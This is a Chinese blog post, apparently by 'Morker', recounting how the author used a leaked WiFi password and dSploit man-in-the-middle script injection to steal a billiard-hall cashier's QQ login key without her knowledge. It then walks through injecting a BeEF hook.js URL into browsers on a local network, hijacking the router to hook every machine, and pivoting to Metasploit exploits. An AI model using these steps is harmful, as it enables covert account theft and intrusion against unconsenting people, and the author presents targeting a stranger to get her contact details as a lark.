前言:
今年五月份去广州与兄弟玩的时候,我们去打桌球,看见收银员妹子不错哦。
然后我就想试着能拿到QQ号码不。所以我想起了wifi、
打开wifi、密码被万能钥匙所收录、所以我链接上去后,果断开启dSploit、
因为就收银台一台电脑、我很快就看到妹子电脑的IP了、果断劫持、
我想,劫持什么的好麻烦的说。想获取妹子的QQkey、于是乎我想到dSploit里的脚本注入、
因为之前都玩过么,就是浏览器浏览页面的时候弹js、我想能不能试着把语句改成xss的地址、说着就做了、
功夫不负有心人,果然可以哦、附图
成功打到了、、
然而最近我看到我这图的时候,就想到能不能用dSploit配合beef或者metasploit呢?
想法有了,就试着做把,可惜,这两天下雨、连续两天的停电,伤不起啊、
不过还是成功的实现了,我用的是dSploit配合beef
过程就看下面的图吧
这是我卡利里的beef,现在是没有主机的、
这是我虚拟机里的xp系统,IP是:192.168.1.106
接下来我们去手机界面看看
我们可以看到我们的目标IP,我们选中
选中后,我们再选择MITM
接下来就是脚本注入了
选择脚本注入,我们自定义代码、
我卡利的IP是192.168.1.105,而beef的默认端口是3000,以及木马是后面加上hook.js
也就是http://192.168.1.105:3000/hook.js
然后我们点击完成、就运行了
我们去xp系统随便打开页面,就基本中招了
如上图,随便打开,百度啊,贴吧啊什么的都行
回到卡利,神奇的事情就发生了,主机上线了,接下来我就不多说了,
这里我只是做个例子,拿一台电脑做实验,如果如题所说是全部,就直接劫持路由器,在dSploit里点击路由IP就行。其他操作一样。
Beef可以本身有很多exploit,而且他可以加载metasploit的模块、
所以你可以利用目标电脑的信息进行溢出了。、、
告诉你们,beef是很强大的公牛哦、、以后手机装上卡利或者BT5,或者笔记本什么的,各种内网渗透了、、、
Author :Morker Blog : http://www.morker.net/